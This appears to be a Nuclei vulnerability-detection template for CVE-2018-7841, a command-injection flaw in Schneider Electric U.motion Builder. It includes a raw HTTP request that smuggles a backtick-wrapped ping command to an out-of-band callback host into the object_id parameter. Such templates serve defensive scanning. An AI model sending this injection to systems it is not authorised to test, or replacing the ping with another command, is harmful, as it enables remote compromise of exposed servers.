id: CVE-2018-7841

info:
  name: Schneider Electric U.motion Builder - Remote Code Execution
  author: darses,rcesecurity
  severity: critical
  description: |
    U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.
  impact: |
    Attackers can execute arbitrary system commands on the server, potentially leading to complete system compromise, data theft, service disruption, or lateral movement within the network.
  remediation: |
    The product has been retired and is no longer available or supported. To further protect their installations from this threat, customers should immediately remove the U.motion Builder software from their systems.
  reference:
    - https://www.exploit-db.com/exploits/46846
    - https://packetstorm.news/files/id/152862
    - https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day
    - https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2017-178-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2019-071-02-Umotion-Builder.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-7841
    cwe-id: CWE-78
    epss-score: 0.54741
    epss-percentile: 0.9808
    cpe: cpe:2.3:a:schneider-electric:u.motion_builder:1.3.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-requests: 1
    vendor: schneider-electric
    product: u.motion_builder
    shodan-query: http.headers_hash:1985490094
  tags: cve,cve2018,schneider-electric,rce,kev,oast,oob,vkev,vuln

variables:
  oast: "{{interactsh-url}}"

http:
  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=`ping -c 1 {{interactsh-url}}`

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 4a0a00473045022004eec286b8232fb978b0fab1cbc04a99d6f7ae915ff46657809bedfbc104c17302210095adcf87714a13abd80bea08884187e25e0d92cfc1f72468df08a260c5c71028:922c64590222798bb761d5b6d8e72950